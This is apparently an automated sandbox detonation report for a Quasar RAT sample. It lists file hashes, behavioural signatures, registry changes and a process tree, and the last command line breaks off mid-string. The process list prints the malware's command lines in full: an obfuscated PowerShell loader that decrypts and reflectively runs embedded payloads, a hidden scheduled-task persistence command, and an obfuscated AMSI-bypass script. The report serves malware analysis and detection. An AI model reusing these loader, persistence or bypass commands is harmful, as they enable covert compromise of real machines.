| SHA512 | 4b104fd0f62ecab38cc02b4cd77e6b8b5bcaaa3d98ad48f537fc7a67aa7d72d4575026921b63c9a743a41faaf3dd3154717bd6690f87dcb4114da05106b93012 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
| MD5 | 3cb6c07e577fcdc8b90fdcd0e16ac355 |
| SHA1 | c53b0a797b2e606c7233bc5a4084cd95b218d615 |
| SHA256 | b8a2cf4223cb872b41b28c245b03764e62eebc0bc9e41fb8c71c032b9b569584 |
| SHA512 | 3ab2121c0b87d35d13e8a7a0f2479f44f623fd0d3693c941c70937c4e85a1cd798d77922e370e6ee38c55d71eb18ca70b25c758523b5019dc0e500b771881c48 |
C:\Users\Admin\AppData\Local\Temp\Install.exe
| MD5 | b489b7d9efc807fb9583f21f39327fc2 |
| SHA1 | 1ee42e6c08cd0a51d5c763c6b8771c004b962865 |
| SHA256 | 6f1bc33cba78e569e98566aa17be4a548c9ed1a6ea0f35a2149ad504def56579 |
| SHA512 | 53be2dc3574e1da8c643b24e6b982a19f6f2f4748acc38d5c625f66e701c1b4124156983c29668c8bed4c79b5f27d0f932c8a38ebecb33170c283f1161068c2e |
Analysis: behavioral1
Detonation Overview
Submitted
2024-06-11 17:41
Reported
2024-06-11 17:42
Platform
win10-20240404-en
Max time kernel
54s
Max time network
46s
Command Line
Signatures
Quasar RAT
Quasar payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious use of NtCreateUserProcessOtherParentProcess
| Description | Indicator | Process | Target |
| PID 3752 created 568 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | C:\Windows\system32\winlogon.exe |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Install.exe | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 3752 set thread context of 208 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | C:\Windows\System32\dllhost.exe |
Enumerates physical storage devices
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\Local Settings | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\winlogon.exe
winlogon.exe
C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k dcomlaunch -s PlugPlay
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k dcomlaunch -s LSM
C:\Windows\system32\dwm.exe
"dwm.exe"
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s lmhosts
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s NcbService
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s EventLog
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Schedule
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s nsi
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s Dhcp
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s EventSystem
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Themes
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s SENS
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s UserManager
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s NlaSvc
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s AudioEndpointBuilder
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s Dnscache
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s netprofm
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k appmodel -s StateRepository
C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s LanmanWorkstation
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k appmodel -s tiledatamodelsvc
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservicenetworkrestricted -s PolicyAgent
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k unistacksvcgroup -s CDPUserSvc
c:\windows\system32\sihost.exe
sihost.exe
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Browser
C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s CryptSvc
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s TrkWks
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s WpnService
c:\windows\system32\taskhostw.exe
taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s TokenBroker
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s CDPSvc
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localserviceandnoimpersonation -s SSDPSRV
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -s WinHttpAutoProxySvc
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s wlidsvc
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
C:\Windows\system32\ApplicationFrameHost.exe
C:\Windows\system32\ApplicationFrameHost.exe -Embedding
C:\Windows\System32\InstallAgent.exe
C:\Windows\System32\InstallAgent.exe -Embedding
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Uni.bat"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('9ZSSIVseT17UszvdY4C5NHz76P6SG2gulfr28Vowtr0='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('iKcHjGMUp8jMw93DJpJszA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $dvDwv=New-Object System.IO.MemoryStream(,$param_var); $bxxfa=New-Object System.IO.MemoryStream; $TRmaY=New-Object System.IO.Compression.GZipStream($dvDwv, [IO.Compression.CompressionMode]::Decompress); $TRmaY.CopyTo($bxxfa); $TRmaY.Dispose(); $dvDwv.Dispose(); $bxxfa.Dispose(); $bxxfa.ToArray();}function execute_function($param_var,$param2_var){ $NYMID=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $tqTZr=$NYMID.EntryPoint; $tqTZr.Invoke($null, $param2_var);}$lgaaF = 'C:\Users\Admin\AppData\Local\Temp\Uni.bat';$host.UI.RawUI.WindowTitle = $lgaaF;$MAhJa=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($lgaaF).Split([Environment]::NewLine);foreach ($fpybs in $MAhJa) { if ($fpybs.StartsWith('YDeMGzpSIOGZpUFjRNFm')) { $QCmKM=$fpybs.Substring(20); break; }}$payloads_var=[string[]]$QCmKM.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -w hidden
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'Windows_Log_605_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Windows_Log_605.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
C:\Windows\sysWOW64\wbem\wmiprvse.exe
C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\Windows_Log_605.vbs"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Windows_Log_605.bat" "
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('9ZSSIVseT17UszvdY4C5NHz76P6SG2gulfr28Vowtr0='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('iKcHjGMUp8jMw93DJpJszA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $dvDwv=New-Object System.IO.MemoryStream(,$param_var); $bxxfa=New-Object System.IO.MemoryStream; $TRmaY=New-Object System.IO.Compression.GZipStream($dvDwv, [IO.Compression.CompressionMode]::Decompress); $TRmaY.CopyTo($bxxfa); $TRmaY.Dispose(); $dvDwv.Dispose(); $bxxfa.Dispose(); $bxxfa.ToArray();}function execute_function($param_var,$param2_var){ $NYMID=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $tqTZr=$NYMID.EntryPoint; $tqTZr.Invoke($null, $param2_var);}$lgaaF = 'C:\Users\Admin\AppData\Roaming\Windows_Log_605.bat';$host.UI.RawUI.WindowTitle = $lgaaF;$MAhJa=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($lgaaF).Split([Environment]::NewLine);foreach ($fpybs in $MAhJa) { if ($fpybs.StartsWith('YDeMGzpSIOGZpUFjRNFm')) { $QCmKM=$fpybs.Substring(20); break; }}$payloads_var=[string[]]$QCmKM.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -w hidden
C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
C:\Users\Admin\AppData\Local\Temp\Install.exe
"C:\Users\Admin\AppData\Local\Temp\Install.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:ogzDqwWhdUBf{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$lJwFyNKTsaMIHN,[Parameter(Position=1)][Type]$oMmkqHfKTl)$IBqrmOULbXN=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+'f'+[Char](108)+'e'+'c'+''+'t'+''+[Char](101)+''+[Char](100)+''+[Char](68)+'e'+[Char](108)+'e'+[Char](103)+''+[Char](97)+''+'t'+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('In'+[Char](77)+'e'+[Char](109)+''+'o'+''+[Char](114)+''+'y'+''+'M'+''+[Char](111)+''+'d'+''+[Char](117)+'le',$False).DefineType(''+[Char](77)+'y'+'D'+''+[Char](101)+'l'+[Char](101)+''+[Char](103)+''+[Char](97)+''+[Char](116)+''+[Char](101)+''+[Char](84)+'y'+[Char](112)+''+'e'+'',''+'C'+''+'l'+''+[Char](97)+''+[Char](115)+''+[Char](115)+''+','+''+'P'+''+[Char](117)+''+'b'+''+[Char](108)+'ic'+[Char](44)+''+[Char](83)+''+[Char](101)+''+[Char](97)+''+[Char](108)+''+[Char](101)+''+[Char](100)+''+[Char](44)+''+'A'+''+[Char](110)+''+'s'+''+'i'+''+[Char](67)+''+[Char](108)+''+'a'+''+'s'+''+'s'+',A'+'u'+'to'+[Char](67)+''+[Char](108)+''+'a'+''+[Char](115)+''+'s'+'',[MulticastDelegate]);$IBqrmOULbXN.DefineConstructor(''+[Char](82)+'TS'+[Char](112)+''+[Char](101)+'c'+[Char](105)+'a'+[Char](108)+'N'+'a'+''+[Char](109)+''+[Char](101)+''+','+''+'H'+''+[Char](105)+''+[Char](100)+''+[Char](101)+'B'+'y'+''+[Char](83)+''+'i'+''+'g'+''+[Char](44)+''+'P'+''+[Char](117)+''+[Char](98)+''+[Char](108)+'ic',[Reflection.CallingConventions]::Standard,$lJwFyNKTsaMIHN).SetImplementationFlags('R'+[Char](117)+''+[Char](110)+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+','+''+[Char](77)+'a'+[Char](110)+''+'a'+'g'+[Char](101)+'d');$IBqrmOULbXN.DefineMethod('I'+'n'+''+[Char](118)+'o'+[Char](107)+''+[Char](101)+'',''+[Char](80)+''+[Char](117)+''+'b'+'l'+'i'+''+'c'+''+[Char](44)+''+[Char](72)+''+[Char](105)+''+'d'+''+'e'+'BySig'+','+''+'N'+''+[Char](1
01)+''+[Char](119)+''+[Char](83)+''+[Char](108)+''+[Char](111)+''+[Char](116)+''+[Char](44)+'V'+[Char](105)+''+[Char](114)+''+'t'+''+[Char](117)+''+[Char](97)+'l',$oMmkqHfKTl,$lJwFyNKTsaMIHN).SetImplementationFlags(''+'R'+'u'+[Char](110)+''+'t'+''+'i'+'m'+[Char](101)+','+[Char](77)+''+[Char](97)+''+[Char](110)+'a'+[Char](103)+''+[Char](101)+''+[Char](100)+'');Write-Output $IBqrmOULbXN.CreateType();}$tDVGJWLUaLdiM=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('S'+[Char](121)+''+[Char](115)+''+[Char](116)+''+[Char](101)+''+'m'+''+'.'+''+'d'+''+[Char](108)+''+[Char](108)+'')}).GetType(''+'M'+''+'i'+''+[Char](99)+''+[Char](114)+''+[Char](111)+''+[Char](115)+''+[Char](111)+''+[Char](102)+'t'+[Char](46)+''+[Char](87)+'i'+[Char](110)+''+[Char](51)+''+'2'+''+[Char](46)+''+'U'+''+[Char](110)+''+'s'+''+[Char](97)+''+'f'+''+[Char](101)+'N'+[Char](97)+''+[Char](116)+''+[Char](105)+''+[Char](118)+''+[Char](101)+'M'+[Char](101)+''+[Char](116)+'h'+[Char](111)+''+[Char](100)+'s');$FpkKdOZrIBKZgz=$tDVGJWLUaLdiM.GetMethod('G'+'e'+'t'+[Char](80)+''+[Char](114)+''+'o'+''+[Char](99)+''+[Char](65)+''+'d'+''+'d'+''+'r'+''+[Char](101)+'s'+[Char](115)+'',[Reflection.BindingFlags](''+[Char](80)+''+'u'+''+[Char](98)+''+'l'+''+'i'+''+'c'+','+[Char](83)+''+[Char](116)+''+'a'+'t'+[Char](105)+''+'c'+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$WxQgSTibJFedvuWSMTN=ogzDqwWhdUBf @([String])([IntPtr]);$yGNuXBkrDmYeGzLzrrKQIW=ogzDqwWhdUBf 
@([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$EbRXADJQnTF=$tDVGJWLUaLdiM.GetMethod(''+'G'+''+[Char](101)+''+'t'+''+[Char](77)+'o'+[Char](100)+''+'u'+'l'+[Char](101)+''+[Char](72)+''+'a'+'n'+[Char](100)+''+[Char](108)+''+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+''+[Char](114)+''+[Char](110)+''+[Char](101)+''+'l'+'3'+[Char](50)+''+[Char](46)+'d'+[Char](108)+'l')));$LHdjCHEWPokIUh=$FpkKdOZrIBKZgz.Invoke($Null,@([Object]$EbRXADJQnTF,[Object](''+[Char](76)+'oa'+[Char](100)+''+[Char](76)+''+[Char](105)+''+[Char](98)+'r'+'a'+'r'+'y'+''+'A'+'')));$uiGfRpGAzoYjWCjvT=$FpkKdOZrIBKZgz.Invoke($Null,@([Object]$EbRXADJQnTF,[Object]('Vi'+[Char](114)+'t'+[Char](117)+''+[Char](97)+''+[Char](108)+'P'+[Char](114)+''+[Char](111)+''+'t'+'e'+[Char](99)+''+[Char](116)+'')));$TXskibr=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($LHdjCHEWPokIUh,$WxQgSTibJFedvuWSMTN).Invoke(''+[Char](97)+''+[Char](109)+'s'+'i'+''+[Char](46)+'d'+'l'+''+[Char](108)+'');$VTgUgtvVPMJtFwuIa=$FpkKdOZrIBKZgz.Invoke($Null,@([Object]$TXskibr,[Object](''+[Char](65)+'m'+[Char](115)+'i'+[Char](83)+''+[Char](99)+''+[Char](97)+'nB'+'u'+''+[Char](102)+'f'+'e'+''+'r'+'')));$UprnTBlnVv=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($uiGfRpGAzoYjWCjvT,$yGNuXBkrDmYeGzLzrrKQIW).Invoke($VTgUgtvVPMJtFwuIa,[uint32]8,4,[r